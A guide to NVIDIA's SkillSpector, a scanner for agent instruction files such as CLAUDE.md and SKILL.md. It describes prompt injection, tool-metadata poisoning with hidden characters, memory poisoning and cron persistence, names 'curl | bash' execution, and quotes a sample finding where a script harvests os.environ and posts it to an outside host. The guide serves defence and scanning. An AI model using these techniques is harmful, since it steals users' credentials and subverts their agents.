AI Agent Skill Security: How to Scan CLAUDE.md, AGENTS.md, and Skill Files Before They Run

26.1% of AI agent skills contain security vulnerabilities, and 5.2% show likely malicious intent, per NVIDIA's research cited in the SkillSpector README. That is the finding to act on. A skill file is the CLAUDE.md, AGENTS.md, or SKILL.md that tools like Claude Code, Codex CLI, and Gemini CLI load automatically when they start, and roughly one in four of them carries a defect a scanner can catch before it runs. SkillSpector, NVIDIA's open-source scanner for exactly this surface, hit more than 7,000 stars (7.6k, per the repo's GitHub page) and trended #3 on GitHub's Python list this week, which tells you the gap is being taken seriously now rather than in the abstract.

This guide is for the developer or ops lead who installs third-party skill files, or who runs an agent in CI. We walk through what the threat actually is, how to scan a file in one command, how to read the score, and the one flag to set first.

What an agent skill is, and why it runs with no vetting step

An agent skill is plain instruction text plus, often, helper scripts. When Claude Code or Codex CLI opens a project, it reads the skill files in scope and folds them into the agent's context, and any scripts they reference run with your shell's privileges, per the SkillSpector README. There is no package registry, no signature check, no review queue. You clone a repo or paste a skill from a gist, the agent picks it up, and it executes with implicit OS trust the moment the session starts.
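Because nothing vets these files on the way in, a useful first step is simply knowing which ones a checkout contains. The sketch below is one way to inventory them. The three file names come from this article; the helper name find_skill_files is hypothetical, and a given agent may load other files that this list does not cover.

```python
from pathlib import Path

# File names taken from this article; a real agent may load others too.
SKILL_FILENAMES = {"CLAUDE.md", "AGENTS.md", "SKILL.md"}


def find_skill_files(root):
    """Return every instruction file under root, sorted for stable output."""
    root = Path(root)
    return sorted(
        p
        for p in root.rglob("*.md")
        # Skip anything stored inside the repository's own .git directory.
        if p.name in SKILL_FILENAMES and ".git" not in p.relative_to(root).parts
    )
```

Calling find_skill_files(".") from the repository root returns the paths worth handing to a scanner before an agent session ever opens the project.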

That is a different attack surface from the one we covered in TrustFall, which abused the MCP trust dialog to auto-run a server defined in .mcp.json. Same threat category, different door. TrustFall weaponized the config that loads tools. Skill files weaponize the instructions that steer the agent and the scripts they carry. If you are mapping the broader picture, our MCP stateless migration guide covers how the protocol layer underneath all of this has been shifting. The skill layer is the part with no gatekeeper at all, which is what makes the 26.1% number land.

What SkillSpector scans for

SkillSpector ships 64 vulnerability patterns across 16 categories, per the README. The full list is below. Three categories carry most of the real-world risk, so read those rows first.

Category	Patterns	What it catches
Prompt injection	5	Instructions that override safety constraints, hidden directives in comments or invisible text, commands to exfiltrate context
Data exfiltration	4	Env-variable harvesting (API keys), file-system enumeration, transmitting context to external URLs
MCP tool poisoning	4	Hidden directives in tool metadata (HTML comments, zero-width chars, base64), homoglyph and right-to-left deception, description-vs-behavior mismatch
Privilege escalation	3	Sudo/root execution, reading SSH keys and tokens
Supply chain	6	`curl | bash` remote execution, obfuscated payloads, dependencies with known CVEs via a live OSV.dev lookup, typosquatting
Excessive agency	4	Unrestricted tool access, autonomous high-impact decisions with no human in the loop
Output handling	3	Model output used without sanitization across a trust boundary
System prompt leakage	3	Direct and indirect extraction of system prompts or internal rules
Memory poisoning	3	Content built to persist across sessions, context-window stuffing that displaces safety constraints
Tool misuse	3	Parameter abuse (`shell=True`, `--force`), chains that bypass per-tool checks
Rogue agent	2	Runtime self-modification, persistence via cron jobs or startup scripts
Trigger abuse	3	Triggers that shadow built-in commands, generic keyword baiting
Dangerous code (AST)	8	`exec()`, `eval()`, dynamic imports, `subprocess`, `os.system`, and chained execution
Taint tracking	5	Credential-to-network flows, file-read-to-exfiltration, external-input-to-code-execution
YARA signatures	4	Known malware, webshell, cryptominer, and exploit-tool matches
MCP least privilege	4	Capabilities used but not declared, wildcard permissions, missing permission fields

Source: SkillSpector README.

The dangerous three are at the top for a reason. Prompt injection is the one most people picture: a line buried in a skill that tells the agent to ignore its guardrails or quietly forward your context elsewhere. Data exfiltration is where a skill harvests os.environ and posts it to an external host, which is how a credential leak becomes a credential theft. MCP tool poisoning is the subtle one. It hides directives inside tool metadata using zero-width characters or homoglyphs, so the description a human reads and the instruction the model parses are not the same string. Static patterns plus optional LLM evaluation are how SkillSpector reaches the subtle cases, prompt injection and tool poisoning in particular, since a homoglyph attack is invisible to a quick eyeball pass.
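To make the hidden-character trick concrete, here is a minimal sketch of how a static check might surface it. It is not SkillSpector's implementation: the code-point list is illustrative, the function name find_hidden_chars is hypothetical, and treating every non-ASCII letter as a possible homoglyph is a crude assumption that will also flag legitimate non-English text.

```python
import unicodedata

# Zero-width and bidirectional-control code points often used to hide text.
# Illustrative only; this is not SkillSpector's actual pattern set.
SUSPICIOUS = {
    "\u200b", "\u200c", "\u200d", "\u2060", "\ufeff",  # zero-width characters
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # bidi embeddings/overrides
    "\u2066", "\u2067", "\u2068", "\u2069",            # bidi isolates
}


def find_hidden_chars(text):
    """Return (line, column, unicode_name) for each suspicious character."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in SUSPICIOUS:
                hits.append((line_no, col, unicodedata.name(ch, "UNNAMED")))
            elif ch.isalpha() and ord(ch) > 127:
                # Crude homoglyph heuristic: a letter outside the ASCII range.
                hits.append((line_no, col, unicodedata.name(ch, "UNNAMED")))
    return hits
```

Run against a tool description containing a Cyrillic "а" in place of a Latin "a", this reports the exact line and column, which is the information a human reviewer cannot get by reading the rendered text.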

How to run a scan

SkillSpector needs Python 3.12+, per the README. Clone it, drop into a virtualenv, and run make install.

# Install from source (requires Python 3.12+)
git clone https://github.com/NVIDIA/skillspector.git
cd skillspector

# Create and activate a virtual environment
python3 -m venv .venv && source .venv/bin/activate

# Install for production use
make install

If you would rather not put Python on the box, build the image and run it in a container. SkillSpector ships a Dockerfile based on the official python:3.12-slim-bookworm image, per the README.

# Build the container, then scan the current directory mounted at /scan
make docker-build
docker run --rm -v "$PWD:/scan" skillspector scan ./my-skill/ --no-llm

Once installed, the scan target can be a directory, a single file, a Git URL, or a zip. The same scan verb covers all four input shapes.

# Scan a local skill directory
skillspector scan ./my-skill/

# Scan a single SKILL.md (or CLAUDE.md / AGENTS.md) file
skillspector scan ./SKILL.md

# Scan a Git repository directly
skillspector scan https://github.com/user/my-skill

A scan, start to finish

Here is the shape of a real run against a skill that harvests environment variables and ships them out. The input is a directory with a SKILL.md and a helper script; the command is a single static-only scan; the output is a risk score, a severity band, and the specific findings with line numbers.

Input: ./suspicious-skill/ containing SKILL.md and scripts/sync.py.

Command:

skillspector scan ./suspicious-skill/ --no-llm

Expected output (abbreviated):

 SkillSpector Security Report  v2.0.0

Skill: suspicious-skill
Source: ./suspicious-skill/

        Risk Assessment
 Metric          Value
 Score           78/100
 Severity        HIGH
 Recommendation  DO NOT INSTALL

Issues (2)

  HIGH: Env Variable Harvesting (E2)
    Location: scripts/sync.py:23
    Finding: for key, val in os.environ.items():...
    Confidence: 94%

  HIGH: External Transmission (E1)
    Location: scripts/sync.py:45
    Finding: requests.post("https://api.skill.io/env"...
    Confidence: 89%
# ... (component table and full explanations omitted)

The output above mirrors the example in the SkillSpector README. Two HIGH findings, one harvesting os.environ and one posting it to an external host, stack into a 78/100 HIGH score with a flat "DO NOT INSTALL" recommendation. That is the pattern the scanner is built to surface: not one smoking gun, but a chain.

Reading the results

The headline is a single number from 0 to 100, and each finding adds to it by severity, per the README: a CRITICAL issue is +50, a HIGH is +25, a MEDIUM is +10, a LOW is +5, and anything in an executable script gets a 1.3x multiplier on top. The total maps to four bands with a plain-language recommendation.

Score	Severity	Recommendation
0-20	LOW	SAFE
21-50	MEDIUM	CAUTION
51-80	HIGH	DO NOT INSTALL
81-100	CRITICAL	DO NOT INSTALL

Source: SkillSpector README.

The bands are deliberately blunt. Anything above 50 is a "do not install," full stop. A single CRITICAL finding alone scores exactly 50, the top of the MEDIUM band, so the 1.3x executable multiplier (50 x 1.3 = 65) or any one additional finding tips it into that zone. Treat MEDIUM as "read every finding by hand before you trust it," not as a passing grade.
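The arithmetic is easy to sketch. The version below uses the severity weights and band edges quoted above, and assumes three things the article does not confirm: that the multiplier applies per finding, that the total is rounded to an integer, and that it is capped at 100. The names risk_score and band are hypothetical.

```python
SEVERITY_POINTS = {"CRITICAL": 50, "HIGH": 25, "MEDIUM": 10, "LOW": 5}
EXECUTABLE_MULTIPLIER = 1.3


def risk_score(findings):
    """Score an iterable of (severity, in_executable_script) pairs."""
    total = 0.0
    for severity, in_script in findings:
        points = SEVERITY_POINTS[severity]
        if in_script:
            points *= EXECUTABLE_MULTIPLIER
        total += points
    # Assumption: the total is rounded and capped at 100.
    return min(100, round(total))


def band(score):
    """Map a 0-100 score to (severity, recommendation) using the table above."""
    if score <= 20:
        return "LOW", "SAFE"
    if score <= 50:
        return "MEDIUM", "CAUTION"
    if score <= 80:
        return "HIGH", "DO NOT INSTALL"
    return "CRITICAL", "DO NOT INSTALL"
```

Under this reading, a CRITICAL finding inside a script scores 65 and lands in HIGH. The two HIGH findings from the sample report would also total 65 rather than the 78 shown there, so the real scorer evidently weighs more than this sketch does. Treat it as an illustration of the bands, not a reimplementation.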

For automation, the format that matters is SARIF. SkillSpector emits Terminal, JSON, Markdown, and SARIF, per the README, and SARIF is the one CI systems and IDEs speak. Write it to a file and a GitHub code-scanning workflow can ingest it like any other static-analysis result.

# Emit SARIF for CI / GitHub code scanning
skillspector scan ./my-skill/ --no-llm --format sarif --output report.sarif

That turns "is this skill safe" from a one-off question into a gate that runs on every change.
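If you want the gate logic in your own hands rather than in the code-scanning UI, a SARIF file is plain JSON and easy to inspect. The sketch below reads the standard SARIF 2.1.0 fields (runs, results, level, ruleId, locations). How SkillSpector maps its severities onto SARIF levels is not stated in this article, so blocking on "error" is an assumption to check against a real report. The function name blocking_results is hypothetical.

```python
import json


def blocking_results(sarif, blocking_levels=("error",)):
    """Return (rule_id, uri, line) for each SARIF result at a blocking level."""
    hits = []
    for run in sarif.get("runs", []):
        for result in run.get("results", []):
            # A result with no explicit level is treated as "warning" here.
            if result.get("level", "warning") not in blocking_levels:
                continue
            locations = result.get("locations") or [{}]
            physical = locations[0].get("physicalLocation", {})
            uri = physical.get("artifactLocation", {}).get("uri", "?")
            line = physical.get("region", {}).get("startLine", 0)
            hits.append((result.get("ruleId", "?"), uri, line))
    return hits


def load_report(path="report.sarif"):
    """Load a SARIF report written by a previous scan."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)
```

A CI step can call blocking_results(load_report()) and fail the job when the list is non-empty, printing each rule, file, and line so the reviewer knows where to look.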

SkillSpector vs GitHub Copilot's validation: what each covers

A reasonable question: doesn't GitHub already do this? On June 9, 2026, GitHub made security validation for third-party coding agents generally available, extending to agents like Claude and OpenAI Codex the checks already running for Copilot's own cloud agent, per the GitHub changelog. When one of those agents opens a pull request, GitHub runs three checks on the code it wrote: CodeQL analysis, a dependency screen against the GitHub Advisory Database, and secret scanning. If it finds something, the agent tries to fix it before finalizing the PR.

That is real coverage, and it is the wrong layer for this problem. Copilot's validation looks at the code the agent generates. SkillSpector looks at the instruction files that configure the agent in the first place. A poisoned CLAUDE.md never shows up as a vulnerability in a generated diff, because the malicious part is the steering text, not the output. It can sit in your repo, shape every agent run, and pass CodeQL clean because there is no vulnerable code for CodeQL to find.

Layer	GitHub Copilot validation	SkillSpector
Agent-generated code in a PR	Covered (CodeQL, Advisory DB, secret scan)	Not the target
Skill / instruction files (`CLAUDE.md`, `AGENTS.md`, `SKILL.md`)	Not scanned	Covered (64 patterns)
MCP tool metadata poisoning	Not scanned	Covered
A subtle prompt injection that passes static checks	Gap	Reduced by LLM stage, not eliminated

Sources: GitHub changelog and SkillSpector README.

Neither fully closes the hardest case. A prompt injection written in clean prose with no executable tell can slip past static patterns, and SkillSpector's optional LLM evaluation reduces that risk without erasing it. The honest framing is layered defense: Copilot guards the output, SkillSpector guards the input, and a careful human still reads anything that scores MEDIUM or above.

The verdict: run it, and set one flag first

If your team installs third-party skill files, pulls agent configs from public repos, or runs any agent in CI, run SkillSpector. The decision is not close. There is no other open-source scanner aimed squarely at the skill-file surface, the install is a clone and a make install, and the 26.1% base rate, per the README, means a scan pays for itself the first time it flags a real vulnerability. The cost of skipping it is a poisoned instruction file steering an agent that already runs with your privileges.

Set --no-llm first. The static-only path needs no API key, runs fast enough to drop into a pre-commit hook or a CI job, and catches the executable and supply-chain patterns that do the most damage, per the README. Add the LLM stage later for the subtle prompt-injection and tool-poisoning cases once the fast gate is in place. The order matters: a fast static gate you actually run beats a thorough scan you skip because it is slow.
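A pre-commit hook or CI step built on that fast path can be a thin wrapper. The sketch below only assembles commands from flags that appear in this article (scan, --no-llm, --format sarif, --output). The helper names are hypothetical, and treating a non-zero exit status as "blocked" is an assumption, since the article does not say how the CLI reports findings through its exit code.

```python
import subprocess


def build_scan_command(target, sarif_path=None):
    """Build a static-only skillspector command from flags shown in this article."""
    cmd = ["skillspector", "scan", str(target), "--no-llm"]
    if sarif_path is not None:
        cmd += ["--format", "sarif", "--output", str(sarif_path)]
    return cmd


def scan_all(targets):
    """Run one static scan per target; return targets whose scan exited non-zero."""
    failed = []
    for target in targets:
        completed = subprocess.run(build_scan_command(target), check=False)
        # Assumption: a non-zero exit status signals a problem. Verify how
        # your installed version reports findings before gating on this.
        if completed.returncode != 0:
            failed.append(target)
    return failed
```

Keeping the command construction in one small function makes it simple to add the LLM stage later by changing a single place.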

For a CI scan pipeline, the container path is the clean way to ship it. Build the image once, run it against every skill file on push, and emit SARIF into your code-scanning workflow with no Python on the runner at all. A managed VPS such as Cloudways gives you a persistent box to host that container and your scan pipeline without standing up infrastructure by hand. Point it at your repos, gate on a HIGH score, and the question "is this skill safe to install" stops being something you answer by reading and starts being something your pipeline answers for you.